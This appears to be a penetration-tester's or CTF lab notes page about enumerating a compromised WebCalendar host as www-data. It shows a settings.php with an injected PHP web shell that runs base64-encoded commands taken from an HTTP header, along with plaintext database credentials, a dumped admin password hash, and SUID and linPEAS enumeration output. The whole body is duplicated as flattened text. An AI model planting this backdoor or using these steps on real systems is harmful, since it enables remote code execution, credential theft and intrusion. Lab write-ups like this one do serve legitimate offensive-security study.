5 box enum www-data

# /webcalendar/includes/settings.php
webcalendar-shell# cat settings.php
<?php
/* updated via install/index.php on Sat, 04 Sep 2021 17:03:47 -0400
install_password: 2b793cda199e6d21d3de4c9906254ee8
db_type: mysql
db_host: localhost
db_database: intranet
db_login: wc
db_password: edjfbxMT7KKo2PPC
db_persistent: false
db_cachedir: /tmp
user_inc: user.php
use_http_auth: false
single_user: false
single_user_login: */print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;
# end settings.php */
?>

# exploring mysql
www-data@ucal:/tmp$ mysql -u root -p
Enter password:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| intranet           |
+--------------------+
2 rows in set (0.00 sec)

mysql> select cal_login, cal_passwd from webcal_user;
+-----------+----------------------------------+
| cal_login | cal_passwd                       |
+-----------+----------------------------------+
| admin     | cbb44d79209bee5af34457c3fafd4f1d |
+-----------+----------------------------------+

SuidEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/sbin/uuidd
/usr/lib/pt_chown
/usr/bin/sudoedit
/usr/bin/mtr
------------------------------

PEAS

Linux version 3.0.0-12-server (buildd@crested) (gcc version 4.6.1 (Ubuntu/Linaro 4.6.1-9ubuntu3) ) #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011
Description:    Ubuntu 11.10

╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -

╣ MySQL version
mysql  Ver 14.14 Distrib 5.1.66, for debian-linux-gnu (x86_64) using readline 6.2

╣ Searching passwords in config PHP files
$db_password = $settings['db_password'];
$db_password = ( $db_password == 'none' ? '' : $db_password );
db_password: edjfbxMT7KKo2PPC
install_password: 2b793cda199e6d21d3de4c9906254ee8

www-data@ucal:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Nov 10  2015 .
drwxr-xr-x 23 root root 4096 Jan 14  2013 ..
-rw-r--r--  1 root root  513 Jan 14  2013 interfaces

www-data@ucal:/opt$ cat interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address XXXXXX.149
        netmask 255.255.255.0
        network XXXXXX.0
        broadcast XXXXXX.255
        gateway XXXXXX.254
        # dns-* options are implemented by the resolvconf package, if installed
        dns-search local

Previous6 privesc KE Next4 :53 dns

Last updated 3 years ago

# /webcalendar/includes/settings.php webcalendar-shell# cat settings.php <?php /* updated via install/index.php on Sat, 04 Sep 2021 17:03:47 -0400 install_password: 2b793cda199e6d21d3de4c9906254ee8 db_type: mysql db_host: localhost db_database: intranet db_login: wc db_password: edjfbxMT7KKo2PPC db_persistent: false db_cachedir: /tmp user_inc: user.php use_http_auth: false single_user: false single_user_login: */print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die; # end settings.php */ ?> # exploring mysql www-data@ucal:/tmp$ mysql -u root -p Enter password: mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | intranet | +--------------------+ 2 rows in set (0.00 sec) mysql> select cal_login, cal_passwd from webcal_user; +-----------+----------------------------------+ | cal_login | cal_passwd | +-----------+----------------------------------+ | admin | cbb44d79209bee5af34457c3fafd4f1d | +-----------+----------------------------------+

Linux version 3.0.0-12-server (buildd@crested) (gcc version 4.6.1 (Ubuntu/Linaro 4.6.1-9ubuntu3) ) #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 Description: Ubuntu 11.10 ╣ Active Ports ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN - ╣ MySQL version mysql Ver 14.14 Distrib 5.1.66, for debian-linux-gnu (x86_64) using readline 6.2 ╣ Searching passwords in config PHP files $db_password = $settings['db_password']; $db_password = ( $db_password == 'none' ? '' : $db_password ); db_password: edjfbxMT7KKo2PPC install_password: 2b793cda199e6d21d3de4c9906254ee8

www-data@ucal:/opt$ ls -la total 12 drwxr-xr-x 2 root root 4096 Nov 10 2015 . drwxr-xr-x 23 root root 4096 Jan 14 2013 .. -rw-r--r-- 1 root root 513 Jan 14 2013 interfaces www-data@ucal:/opt$ cat interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback # The primary network interface auto eth0 iface eth0 inet static address XXXXXX.149 netmask 255.255.255.0 network XXXXXX.0 broadcast XXXXXX.255 gateway XXXXXX.254 # dns-* options are implemented by the resolvconf package, if installed dns-search local